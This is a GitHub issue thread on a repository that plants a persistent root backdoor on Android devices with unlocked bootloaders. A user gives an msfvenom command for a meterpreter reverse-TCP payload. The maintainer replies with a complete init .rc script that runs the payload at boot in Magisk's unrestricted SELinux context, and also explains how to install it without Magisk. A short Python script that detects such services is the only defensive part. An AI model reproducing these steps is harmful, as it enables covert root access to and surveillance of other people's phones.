LuigiVampa92 / unlocked-bootloader-backdoor-demo

Installs a persistent backdoor binary on android devices with unlocked bootloader via TWRP that runs as system daemon with root permissions and without SELinux restrictions
GNU General Public License v3.0
50 stars 11 forks

Question/Help #1

Open gabriel-maxx opened 10 months ago

gabriel-maxx commented 10 months ago

Hi, could you tell me something? If I have a rooted Android device, then how do I:

msfvenom -p linux/armle/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 -f elf -o revshell

I copy the revshell binary to /system/bin/ and then I create a revshell.rc script and copy it to /system/etc/init/

But could you explain what the content of this rc script would look like? What do I have to put inside for it to work?

LuigiVampa92 commented 9 months ago

Hi, thanks for your interest in the project.

msfvenom is a CLI tool to build shell binaries, so it should be executed not on the smartphone, but on your computer. It can be used on any Linux OS, but it is already conveniently embedded into Kali. -p linux/armle/meterpreter/reverse_tcp is the type of payload: reverse shell, TCP, for Linux OS and ARM CPUs. -f elf is the file format: Linux binary executable. So, when it runs it will connect to the LHOST host on the LPORT port (you must control this host and have a listener waiting there for the connection), and you will get a shell to the target device.

The idea is to build a "native" Android binary for ARM architecture CPU, put it alongside other system binaries on your smartphone (/system/bin/revshell), that are available system-wide, and then run it as a daemon when the OS loads. To run it as the daemon you have to make an init script (.rc script in case of Android, think of it as a systemd script in other Linux distributions). While you have to generate the binary for your own specific case, the content of the init script is very simple and it is always like this:

service revshell /system/bin/revshell
    disabled
    seclabel u:r:magisk:s0
    shutdown critical

on property:sys.boot_completed=1
    start revshell

So create the file /system/etc/init/revshell.rc on your smartphone with the content above and it will automatically be executed by the init process during system load. The stuff in this script is:

service revshell /system/bin/revshell - pretty much self-explanatory. It is a definition of your system service in the format service SERVICE_NAME PATH_TO_SERVICE_BINARY.

disabled - is the marker that tells that the service is disabled by default, but the conditions of its start are simply described below (on property:sys.boot_completed). The idea is to not start the service until the system and other services are fully booted, just in case, to make sure everything is smooth, no missing mounts etc.

seclabel u:r:magisk:s0 - it is a definition of the SELinux context that needs to be set on your service process. That's the most critical part. Magisk injects a special SELinux context for itself to run its own daemon (magiskd), and this context is "almighty", it has absolutely zero restrictions in the system; technically magiskd spawns new processes with shells for you when you call su with this exact context. If you do not place that line here, the init process will refuse to start your service, as there is no prescribed transition rule to start the revshell service from the init process context.

shutdown critical - this line tells init to consider this service critical for the system. It is not strictly necessary but adds some minor benefits, so why not?

Once both files are placed into the /system partition, you will have your daemon running and will be able to connect to your phone from your server and do anything you want there with root privileges.

The installer that is generated by the tool in this repo will generate a flashable zip file that can be installed via TWRP or other custom recovery projects that can provide you adb sideload mode. It will automatically create the /system/etc/init/revshell.rc file for you with all the content and put it into /system.

Hope it helps, sorry for the long answer
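For anyone auditing a device for this kind of persistence, the following is an added example (not code from the repository or from this thread): a minimal parser for Android init .rc files that records each service's seclabel and the on-trigger sections that start it, then flags services running in a non-stock SELinux domain. The sample rc text is constructed from the snippet above plus a benign service for contrast, and the set of suspicious domains is assumed to be just the Magisk domain discussed here.

```python
from dataclasses import dataclass, field

# Constructed sample (not the repository's file): the revshell.rc from the thread plus a benign service.
SAMPLE_RC = """\
service revshell /system/bin/revshell
    disabled
    seclabel u:r:magisk:s0
    shutdown critical
on property:sys.boot_completed=1
    start revshell
service logtool /system/bin/logtool
    class late_start
    user shell
"""

# SELinux domains that only exist once Magisk has patched the policy; stock init scripts never use them.
SUSPICIOUS_DOMAINS = {"magisk"}

@dataclass
class Service:
    name: str
    binary: str
    seclabel: str = ""
    started_by: list = field(default_factory=list)

def parse_rc(text):
    """Collect service blocks and the 'on <trigger>' sections that start them."""
    services, section, trigger = {}, None, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()      # strip comments
        if not line.strip():
            continue
        parts = line.split()
        if not line[0].isspace():                 # unindented line = section header
            section = trigger = None
            if parts[0] == "service" and len(parts) >= 3:
                section = services.setdefault(parts[1], Service(parts[1], parts[2]))
                section.binary = parts[2]         # fill in if a 'start' was seen first
            elif parts[0] == "on":
                trigger = " ".join(parts[1:])
        elif section is not None and parts[0] == "seclabel" and len(parts) == 2:
            section.seclabel = parts[1]
        elif trigger is not None and parts[0] == "start" and len(parts) == 2:
            services.setdefault(parts[1], Service(parts[1], "?")).started_by.append(trigger)
    return services

def find_suspicious(text):
    """Return (name, binary, seclabel, triggers) for services running in a non-stock domain."""
    return [(s.name, s.binary, s.seclabel, s.started_by) for s in parse_rc(text).values()
            if len(s.seclabel.split(":")) >= 3 and s.seclabel.split(":")[2] in SUSPICIOUS_DOMAINS]
```

Run it over every file under /system/etc/init (and the vendor/odm init directories) pulled from a device image to list services that would start in the Magisk domain at boot.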

gabriel-maxx commented 9 months ago

Thanks for the explanation, but my problem is that I've tried everything and I can't install Magisk on my phone. I think my model is incompatible, but I have root access, and so I would like to know: is it possible to do this without Magisk, just with root access?

LuigiVampa92 commented 9 months ago

Hm, perhaps I didn't understand you properly. So your problem is that you already have root but do not have Magisk? Is that some multimedia device? Or an emulator?

Technically, you can install this binary and service script into your system, but you have to make sure that there are no working system integrity measures, like verified boot and dm-verity. If there are none, then just remount your partition or make a mount overlay to add new files to your system fs.

However, I must warn you, if there are some measures then your device might be bricked after you write new files to /system. Please be cautious. I cannot give you any advice, you have to understand the risks and investigate that yourself.